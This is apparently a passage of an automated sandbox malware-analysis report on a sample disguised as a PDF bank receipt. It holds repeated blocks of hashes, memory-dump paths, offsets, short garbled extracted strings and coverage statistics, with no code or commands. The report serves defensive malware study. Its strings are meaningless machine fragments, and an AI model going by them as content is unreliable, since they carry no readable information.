                                                                                                                                                          • API String ID: 0-2636374853
                                                                                                                                                          • Opcode ID: 9210aaf26442e48b085b4a8090c7c719e21b4c7101eecd0b5f30d9692056cd0f
                                                                                                                                                          • Instruction ID: 4b05b0345aeda770579fec66b963cf3cab9f683226478febd0ddc7be80186f05
                                                                                                                                                          • Opcode Fuzzy Hash: 9210aaf26442e48b085b4a8090c7c719e21b4c7101eecd0b5f30d9692056cd0f
                                                                                                                                                          • Instruction Fuzzy Hash: 2581E574E0120ADFCB04DFA9D5859AEFBB2FB88310F10856AE515E7324D7349A81CF94
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ]]o
                                                                                                                                                          • API String ID: 0-2636374853
                                                                                                                                                          • Opcode ID: f817b91fca4763f744f0d258be44a673b665d32a0ca352fa6940ea14bc0ced58
                                                                                                                                                          • Instruction ID: 5224b14e466a20d80414392fbc6987cce65726776416861517241858e9a9412f
                                                                                                                                                          • Opcode Fuzzy Hash: f817b91fca4763f744f0d258be44a673b665d32a0ca352fa6940ea14bc0ced58
                                                                                                                                                          • Instruction Fuzzy Hash: F671F374E0120EDFCB04DF99D5849AEFBB2FB88310F14856AE515B7328D734AA818F94
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: i#)6
                                                                                                                                                          • API String ID: 0-3600651614
                                                                                                                                                          • Opcode ID: 230484c8d59b35586c10f264b949e0ab621df9c686bfdfea64a961dd0f35d59d
                                                                                                                                                          • Instruction ID: 1242e2390b0ff9d605180b190c2ffcb98ce7e4dbf5a308bd15a23e266c8c0cb2
                                                                                                                                                          • Opcode Fuzzy Hash: 230484c8d59b35586c10f264b949e0ab621df9c686bfdfea64a961dd0f35d59d
                                                                                                                                                          • Instruction Fuzzy Hash: C24139B0E0620EDFCB08CFA6C5456AEFBF1AF99704F20946AC015E7264E3349B458B95
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: i#)6
                                                                                                                                                          • API String ID: 0-3600651614
                                                                                                                                                          • Opcode ID: dc4a0d76b74dc34347a809d9b819ac09819c7681eb6b550134fcceb92a0dc4f3
                                                                                                                                                          • Instruction ID: 1ca58380d222ee85a4257a9378e3a08f37fc31f986b22d35590316bf49e128ef
                                                                                                                                                          • Opcode Fuzzy Hash: dc4a0d76b74dc34347a809d9b819ac09819c7681eb6b550134fcceb92a0dc4f3
                                                                                                                                                          • Instruction Fuzzy Hash: 6D41F9B0E0620EDBCB48CFA6C5456EEFBF1AF95704F20D42AC115E7264E33497458B95
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cf5fe6ba6c2c2d4c274ff8ff12537817816a743703f2513203262b6eb68f13ac
                                                                                                                                                          • Instruction ID: faa731ddecef52b5ee0ec4b88e3b966ddf5303a805deba1986c15e232d34acf9
                                                                                                                                                          • Opcode Fuzzy Hash: cf5fe6ba6c2c2d4c274ff8ff12537817816a743703f2513203262b6eb68f13ac
                                                                                                                                                          • Instruction Fuzzy Hash: C3F1DD70B016099FDB65DF75C814BAEBBF6AF89200F14886EC205AB691DB34E941CB52
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f96995ac7074c304e6ad6c5f47a90d5e1dc9b45efa9fa05b055c186dbf6ddc55
                                                                                                                                                          • Instruction ID: 9a9b1a1feef1b12398995078bffaca065cbd90d2bc6b74b898f1f22bdd9de9ed
                                                                                                                                                          • Opcode Fuzzy Hash: f96995ac7074c304e6ad6c5f47a90d5e1dc9b45efa9fa05b055c186dbf6ddc55
                                                                                                                                                          • Instruction Fuzzy Hash: FD713470D0120ADFCB04CFAAD9406EEFFB2BF88300F14966AE115AB255D7349A46CF94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 09783d7366c7ee9997dd2412a8ee602c4aaf74d8853b53f0726243033bdff52d
                                                                                                                                                          • Instruction ID: ded21c1751fcdfa758cc672037e955b15465361cdb8a5d4dfcfa8b309d78ebf2
                                                                                                                                                          • Opcode Fuzzy Hash: 09783d7366c7ee9997dd2412a8ee602c4aaf74d8853b53f0726243033bdff52d
                                                                                                                                                          • Instruction Fuzzy Hash: F3711570D01219DFCB04CFAAD9405EEFFB2BF89300F14A62AE116AB255D7349A46CF94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 558fae6fb33f97bd2e0029f1cb712e2decab76c8b95d7c1a1dec0e3d83350d61
                                                                                                                                                          • Instruction ID: 68b5c0a837479c46f3fc7f745a080421feb9cc0cc007cd447b7efed5f1d310ed
                                                                                                                                                          • Opcode Fuzzy Hash: 558fae6fb33f97bd2e0029f1cb712e2decab76c8b95d7c1a1dec0e3d83350d61
                                                                                                                                                          • Instruction Fuzzy Hash: 7E615974E06209DFCB08DFA9E5409AEFBB2FB89300F10D52AE516A7354DB349A16CF54
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 91595f838ef8e6220c6c928d7874ac853097b012a43f262c5895775bc0ee3bca
                                                                                                                                                          • Instruction ID: e85e8f51d4fd0cfe465efb3ac15e9a8703cbaeb0cf4c64984d1ed9b7e9d29f57
                                                                                                                                                          • Opcode Fuzzy Hash: 91595f838ef8e6220c6c928d7874ac853097b012a43f262c5895775bc0ee3bca
                                                                                                                                                          • Instruction Fuzzy Hash: 6371E074E0520D9FCB14CFA9D6809DEFBF2FB89210F28942AD515B7364DB309A418B64
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 60b2df1917fcfe50b0b94a7d27a07cffddee757147182b27aa7cd8e7c34e6410
                                                                                                                                                          • Instruction ID: 127a487207ca73c3deb1d2c5b68f5850e6c3f560e6d4983e00986752fdbe79b8
                                                                                                                                                          • Opcode Fuzzy Hash: 60b2df1917fcfe50b0b94a7d27a07cffddee757147182b27aa7cd8e7c34e6410
                                                                                                                                                          • Instruction Fuzzy Hash: 6671E374E05219CFCB44CFA9D9945EEFBF2FF89210F24942AD456BB324D7309A428B64
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bdce28d0ee4d1fec85d713a3ea8efbb96ac722f32d4747f9839d1f38f56dda6f
                                                                                                                                                          • Instruction ID: 6c3737d87ee485d09ea81455f43e42eb8b39d183b04b4fdfa8d43edbd8e10dc9
                                                                                                                                                          • Opcode Fuzzy Hash: bdce28d0ee4d1fec85d713a3ea8efbb96ac722f32d4747f9839d1f38f56dda6f
                                                                                                                                                          • Instruction Fuzzy Hash: F0611470E05219CFCB44CFA9D9945EEFBF2FF89310F24902AD456BB224D3309A428B64
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 514c840e133f9289e1ee1dacec676dce495019ceea7cf755bc4e7cf0ef63fb64
                                                                                                                                                          • Instruction ID: 0661810fba734d3fea4ae705bc0282c8aa5696de03a4f539f9d70195f4a64b96
                                                                                                                                                          • Opcode Fuzzy Hash: 514c840e133f9289e1ee1dacec676dce495019ceea7cf755bc4e7cf0ef63fb64
                                                                                                                                                          • Instruction Fuzzy Hash: 87615974E05209DFCB08DFA9E5409AEFBB2FB89300F10D52AE516A7354DB349A06CF54
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0dfeffe55ea33e45219809b3d5cfb3f5713ed33f08fd8dbeae49cd3718cee6d9
                                                                                                                                                          • Instruction ID: 8c0f9af4aca92cdd2423ffb2f0daca6445e328146bf88b729a625cc39502bd76
                                                                                                                                                          • Opcode Fuzzy Hash: 0dfeffe55ea33e45219809b3d5cfb3f5713ed33f08fd8dbeae49cd3718cee6d9
                                                                                                                                                          • Instruction Fuzzy Hash: 7E511674D0521E8FCF04CFA6C4401EEFBF1AF8A605F1498AAC525B7264E77896428F65
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c5b2074971d21d7c8c27902c58c2a12626344693e3c27786e0b34bf5aabbd899
                                                                                                                                                          • Instruction ID: d510b72ccc96103b2fc34b3d8864a6077c92c23b04ae01f2bce712e80c56c928
                                                                                                                                                          • Opcode Fuzzy Hash: c5b2074971d21d7c8c27902c58c2a12626344693e3c27786e0b34bf5aabbd899
                                                                                                                                                          • Instruction Fuzzy Hash: AE510574D0521EDFCF04CFA6C4405EEFBF2EB8AA05F14986AC525B7224E73896418F69
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ed16f89e1d0e45b1fb492269fa472c92ebad1936d010b8b39f96535ab900da40
                                                                                                                                                          • Instruction ID: 17726e718ca82ca223221d493e14d9fc8478e4ad733e2594024f6e275d45fa21
                                                                                                                                                          • Opcode Fuzzy Hash: ed16f89e1d0e45b1fb492269fa472c92ebad1936d010b8b39f96535ab900da40
                                                                                                                                                          • Instruction Fuzzy Hash: DD5108B4E042198FDB14CFA9C5805AEBBF2FF89304F2485A9D518BB216D7355D42CFA1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5232870bb1b7877d54bf273853ee8aacc5acdb0bbfb363b23c5e397abe53f70d
                                                                                                                                                          • Instruction ID: c07f9e194856095fca64e189852618e2ae7e728783ff4812387d87c4bc8d8597
                                                                                                                                                          • Opcode Fuzzy Hash: 5232870bb1b7877d54bf273853ee8aacc5acdb0bbfb363b23c5e397abe53f70d
                                                                                                                                                          • Instruction Fuzzy Hash: 45510874E042198FCB14CFA9C9805AEBBF2FF89304F24866AD508AB756D735AD41CF60
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fc7b49254c70263a40b80834e4128fe7e6d426bb5c49fb1ee729dcc83dd45ad9
                                                                                                                                                          • Instruction ID: 046216d7dd3c8006be7bced519f7c8936b13dfcccb79c98f6d4d4358a7aabf96
                                                                                                                                                          • Opcode Fuzzy Hash: fc7b49254c70263a40b80834e4128fe7e6d426bb5c49fb1ee729dcc83dd45ad9
                                                                                                                                                          • Instruction Fuzzy Hash: B641D531D0D3848FD71ACF69D8105AABFB2AF86310F19C1ABD048EB266CB344D55CB62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (okq$(okq$,oq$,oq$Hoq$d8pq
                                                                                                                                                          • API String ID: 0-157866490

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:10.9%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:81
                                                                                                                                                          Total number of Limit Nodes:3

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (okq$(okq$(okq$,oq$,oq
                                                                                                                                                          • API String ID: 0-3760967313

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Xoq$Xoq$Xoq$Xoq
                                                                                                                                                          • API String ID: 0-1961338500
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (okq$4'kq
                                                                                                                                                          • API String ID: 0-1210385896
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (okq$Hoq
                                                                                                                                                          • API String ID: 0-4134915641
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Xoq$Xoq
                                                                                                                                                          • API String ID: 0-251439590
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
